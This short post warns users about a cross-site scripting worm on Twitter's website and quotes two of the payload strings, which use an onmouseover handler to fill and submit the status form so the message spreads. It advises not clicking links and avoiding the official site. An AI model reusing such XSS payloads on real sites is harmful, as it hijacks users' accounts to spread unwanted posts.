This is how a message like that looks like (DO NOT click on that links!!):
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/or another one:
http://t.co/@"onmouseover="document.getElementById('status').value='RT Unlevin ';$('.status-update-form').submit();"class="modal-overlay"/It seems that most third party clients aren't affected by the exploit. Stop using Twitter's official website for now, as the strange messages are still coming in. Anyway, DO NOT click on the websites that tweets are linking to, they can possibly try to insert malicious code in your computer.
Twitter didn't announce anything about this until now, but they'll surely notify users when Twitter.com is safe, so follow status.twitter.com for latest news.